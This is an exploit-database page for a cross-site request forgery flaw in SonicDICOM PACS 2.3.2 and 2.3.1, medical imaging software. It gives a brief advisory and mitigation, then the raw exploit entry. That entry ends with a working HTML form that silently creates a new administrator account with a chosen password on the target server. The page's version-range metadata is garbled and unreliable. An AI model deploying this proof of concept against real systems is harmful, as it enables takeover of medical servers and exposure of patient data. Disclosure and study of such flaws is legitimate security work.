header-logo
Suggest Exploit
vendor:
SonicDICOM PACS
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: SonicDICOM PACS
Affected Version From: 2.3.2002
Affected Version To: 2.3.2001
Patch Exists: NO
Related CWE:
CPE: a:jiun:sonicdicom_pacs:2.3.2
Metasploit:
Other Scripts:
Platforms Tested: Microsoft-HTTPAPI/2.0
2016

SonicDICOM PACS 2.3.2 CSRF Add Admin Exploit

The SonicDICOM PACS software version 2.3.2 and 2.3.1 allows users to perform actions via HTTP requests without validity checks. This can be exploited to perform actions with administrative privileges if a logged-in user visits a malicious website.

Mitigation:

Implement proper validation checks for HTTP requests to prevent CSRF attacks. Regularly update the SonicDICOM PACS software to the latest version.
Source

Exploit-DB raw data:

SonicDICOM PACS 2.3.2 CSRF Add Admin Exploit


Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1

Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: Microsoft-HTTPAPI/2.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5395
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5395.php

22.11.2016

--


<html>
  <body>
    <form action="http://172.19.0.214/viewer/api/accounts/create" method="POST">
      <input type="hidden" name="Id" value="testingus" />
      <input type="hidden" name="Name" value="Second Admin" />
      <input type="hidden" name="Authority" value=“1” />
      <input type="hidden" name="Password" value="654321" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR